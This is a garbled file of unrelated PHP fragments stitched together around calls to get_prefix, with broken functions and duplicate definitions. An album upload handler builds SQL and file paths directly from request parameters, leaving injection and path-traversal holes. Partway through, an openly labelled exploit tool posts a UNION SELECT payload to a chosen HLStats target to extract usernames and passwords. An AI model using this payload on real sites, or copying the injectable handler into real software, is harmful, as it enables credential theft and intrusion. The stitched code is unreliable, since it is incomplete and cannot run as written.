require dirname(__FILE__) . '/includes/init.php';
if ($_REQUEST['act'] == 'list') {
$album_types = get_album_types();
$smarty->assign("album_types", $album_types);
$smarty->display('album_list.htm');
exit;
} elseif ($_REQUEST['act'] == 'ajax_list') {
$list = album_list();
make_json($list);
} elseif ($_REQUEST['act'] == 'upload') {
//获取文件上传的目录
$targetPath = '../resource/data/album/' . $_REQUEST['atype_id'];
$verifyToken = md5('unique_salt' . $_REQUEST['timestamp']);
if (!empty($_FILES) && $_REQUEST['token'] == $verifyToken) {
$tempFile = $_FILES['Filedata']['tmp_name'];
$image_name = unique_name($targetPath . '/') . '.' . get_prefix($_FILES['Filedata']['name']);
$targetFile = rtrim($targetPath, '/') . '/' . $image_name;
move_uploaded_file($tempFile, $targetFile);
$sql = "insert into " . $ecs->table("album") . " (class_code, type, name, path, filesize, creator, created) \r\n\t\tvalues ('" . $_SESSION['class_code'] . "','" . $_REQUEST['atype_id'] . "', '" . $_REQUEST['Filename'] . "',\r\n\t\t\t'" . $targetFile . "','" . $_FILES['Filedata']['size'] . "','" . $_SESSION['admin_id'] . "',now()) ";
$db->query($sql);
admin_log(addslashes($_REQUEST['Filename']), 'upload', "album_picture");
make_json_result("上传“" . $_REQUEST['Filename'] . "”成功!");
}
make_json_error("上传" . $_REQUEST['Filename'] . "失败!");
} elseif ($_REQUEST['act'] == 'ajax_save') {
$id = !empty($_REQUEST['album_id']) ? intval($_REQUEST['album_id']) : 0;
$sql = "update " . $ecs->table("album") . " set name='" . $_REQUEST["name"] . "',\r\n\t\t\tsort='" . $_REQUEST["sort"] . "'\r\n\t\t\twhere album_id=" . $id;
$db->query($sql);
admin_log(addslashes($_REQUEST["name"] . $id), 'update', $sql);
make_json_result("修改成功!");
} elseif ($_REQUEST['act'] == 'ajax_delete') {
function get_prefix($CategoryID)
{
global $tpl, $template, $config, $mysql, $lang, $twig, $prefixed;
$ParentID = $mysql->result('SELECT parent_id FROM ' . prefix . '_eshop_categories WHERE id = ' . $CategoryID . ' ');
$prefixed[$CategoryID]['f'] .= ' ';
if ($ParentID == 0) {
$add_prefix .= '';
} else {
$prefixed[$CategoryID]['s'] .= '<img src="/engine/plugins/eshop/tpl/img/tree.gif"> ';
$add_prefix .= '<img src="/engine/plugins/eshop/tpl/img/tree.gif"> ';
foreach ($mysql->select("SELECT * FROM " . prefix . "_eshop_categories WHERE id=" . $ParentID . " ") as $row2) {
$CategoryID2 = $row2['id'];
$ParentID2 = $row2['parent_id'];
}
get_prefix($CategoryID2);
}
#var_dump($prefixed[$CategoryID]);
return $add_prefix;
}
function upgrade_move_att2disk( $p_source ) {
# $p_source is the string "attachment" or "project"
if( $p_source == 'attachment' ) {
$t_file_table = db_get_table( 'bug_file' );
$t_bug_label = "Bug";
}
if( $p_source == 'project' ) {
$t_file_table = db_get_table( 'project_file' );
$t_bug_label = "Project";
}
# check that the source was valid
if( !isset( $t_file_table ) ) {
echo 'Failure: Internal Error: File source not set';
return;
}
# check that the destination is set up properly
$t_upload_method = config_get_global( 'file_upload_method' );
if( $t_upload_method <> DISK ) {
echo 'Failure: Upload Method is not DISK';
return;
}
$query = 'SELECT * FROM ' . $t_file_table . ' WHERE content <> \'\'';
$result = @db_query_bound( $query );
if( false == $result ) {
echo '<p>No attachments need to be moved.</p>';
return;
}
$count = db_num_rows( $result );
echo '<p>Found ' . $count . ' attachments to be moved.</p>';
$t_failures = 0;
if( $count > 0 ) {
echo '<table width="80%" bgcolor="#222222" cellpadding="10" cellspacing="1">';
# Headings
echo '<tr bgcolor="#ffffff"><th width="10%">' . $t_bug_label . '</th><th width="20%">Attachment</th><th width="70%">Status</th></tr>';
}
for( $i = 0;$i < $count;$i++ ) {
$t_row = db_fetch_array( $result );
// trace bug id back to project to determine the proper file path
if( $p_source == 'attachment' ) {
$t_project_id = bug_get_field( $t_row['bug_id'], 'project_id' );
$t_bug_id = $t_row['bug_id'];
} else {
$t_project_id = (int) $t_row['project_id'];
$t_bug_id = $t_project_id;
}
$t_file_path = project_get_field( $t_project_id, 'file_path' );
$prefix = get_prefix( $t_file_path );
$t_real_file_path = $prefix . $t_file_path;
$c_filename = file_clean_name( $t_row['filename'] );
printf( "\n<tr %s><td>%8d</td><td>%s</td><td>", helper_alternate_class(), $t_bug_id, $t_row['filename'] );
if( is_blank( $t_real_file_path ) || !file_exists( $t_real_file_path ) || !is_dir( $t_real_file_path ) || !is_writable( $t_real_file_path ) ) {
echo 'Destination ' . $t_real_file_path . ' not writable';
$t_failures++;
} else {
$t_file_name = $t_real_file_path . $c_filename;
// write file to disk store after adjusting the path
if( file_put_contents( $t_file_name, $t_row['content'] ) ) {
// successful, update database
/** @todo do we want to check the size of data transfer matches here? */
$c_new_file_name = $t_file_path . $c_filename;
$query2 = "UPDATE $t_file_table SET diskfile = " . db_param() . ",
folder = " . db_param() . ", content = '' WHERE id = " . db_param();
$update = @db_query_bound( $query2, Array( $c_new_file_name, $t_file_path, $t_row['id'] ) );
if( !$update ) {
echo 'database update failed';
$t_failures++;
} else {
echo 'moved to ' . $t_file_name;
}
} else {
echo 'copy to ' . $t_file_name . ' failed';
$t_failures++;
}
}
echo '</td></tr>';
}
echo '</table><br />' . $count . ' attachments processed, ' . $t_failures . ' failures';
}
function triples_to_rdfquery($triples)
{
global $prefix;
$rdfquery = '';
//print_r($triples);
$uri = key($triples['result']);
$count = 0;
foreach ($triples['result'] as $k => $v) {
foreach ($v as $key => $value) {
$subject = '';
if ($count > 0) {
$subject .= ",\n";
}
$count++;
$subject .= "\$.rdf.triple('<{$uri}> ";
$subject .= get_qname($key);
$namespaces = "namespaces: { " . get_short_prefix($key) . ": '" . get_prefix($key) . "' }";
/* echo '<pre>';
print_r($value);
echo '</pre>';
*/
foreach ($value as $v) {
$object = '';
if ($v['type'] == 'literal') {
$object .= ' "' . str_replace("'", "\\'", $v['value']) . '"';
} else {
$object .= ' <' . $v['value'] . ">";
}
$rdfquery .= $subject . $object;
$rdfquery .= " .',{\n{$namespaces}\n})";
}
}
}
$rdfquery .= "\n";
return $rdfquery;
}
$GLOBALS["VERBOSE"] = true;
}
if ($argv[1] == "--id") {
parse_db($argv[2]);
die;
}
if ($argv[1] == "--import-id") {
import_users($argv[2]);
die;
}
if ($argv[1] == "--make-unique") {
make_database_unique($argv[2]);
die;
}
if ($argv[1] == "--get-prefix") {
get_prefix($argv[2]);
die;
}
$unix = new unix();
$pidfile = "/etc/artica-postfix/" . basename(__FILE__) . ".pid";
$pid = trim(@file_get_contents($pidfile));
if ($unix->process_exists($pid)) {
$pid = getmypid();
echo "[{$pid}]:: Process {$pid} already running...\n";
die;
}
function get_prefix($path)
{
if (!is_file("{$path}.pre")) {
$handle = @fopen("{$path}", "r");
$d = 0;
}
return $prefix;
}
if (isset($_REQUEST['target']) && $_REQUEST['target'] != '') {
//this exploit can take its sweet time.
set_time_limit(0);
$http = new http();
$addr = explode('?', $_REQUEST['target']);
$addr = $addr[0];
if (isset($_REQUEST['proxy'])) {
$http->proxy($_REQUEST['proxy']);
}
switch ($_REQUEST['button']) {
case 'HLStats_Logins':
$table = false;
$prefix = get_prefix($addr);
//print_r($prefix);
foreach ($prefix as $pre) {
if (!$table) {
print "trying table prefix:{$pre}<br>";
//no comments are used in this payload, instead a second union select is used to finnish the query.
$pay = "killLimit=1000%20union%20select%20username,password,acclevel,1,playerId%20from%20" . $pre . "Users%20UNION%20SELECT%201,1,1,1,1%20FROM%20" . $pre . "Players%20WHERE%201=0";
$resp = $http->post($addr . "?mode=playerinfo&player=1", '', $pay);
$table = hl_get_sql($resp);
//
}
}
if (!$table && @(!in_array('hlstats_', $prefix))) {
//ooah no the exploit has failed so far.
$pre = "hlstats_";
//try the default prefix
/**
* Finds the default class for an identifier or return null.
*
* @param KServiceIdentifier $identifier The identifier of the class
*
* @return string|bool Return the class name or false if not found
*/
public static function findDefaultClass($identifier)
{
$strIdentifier = (string) $identifier;
if (isset(self::$_defaults[$strIdentifier])) {
$classname = self::$_defaults[$strIdentifier];
if ($classname === false || class_exists($classname)) {
return $classname;
}
}
$classbase = 'Lib' . ucfirst($identifier->package) . KInflector::implode($identifier->path);
$loader = KService::get('koowa:loader');
$classname = $classbase . ucfirst($identifier->name);
if (!class_exists($classname)) {
$classname = $classbase . 'Default';
if (!class_exists($classname)) {
$classname = false;
}
}
if ($classname === false) {
if (isset(self::$_identifiers[$strIdentifier])) {
$config = self::$_identifiers[$strIdentifier];
if (isset($config['default'])) {
$classes = array_unique($config['default']);
} else {
$classes = get_prefix($config['prefix'], $config['name']);
if (isset($config['fallback'])) {
$classes[] = $config['fallback'];
}
}
foreach ($classes as $class) {
//make sure to find path first
//then try to load it
if ($loader->findPath($class, $identifier->basepath) && $loader->loadClass($class, $identifier->basepath)) {
$classname = $class;
break;
}
}
}
}
self::setDefaultClass($strIdentifier, $classname);
return $classname;
}
public function detach($channel)
{
$args = array();
$args['channel'] = get_prefix() . $channel;
$this->send_control(\GripControl\GripControl::websocket_control_message('detach'));
}
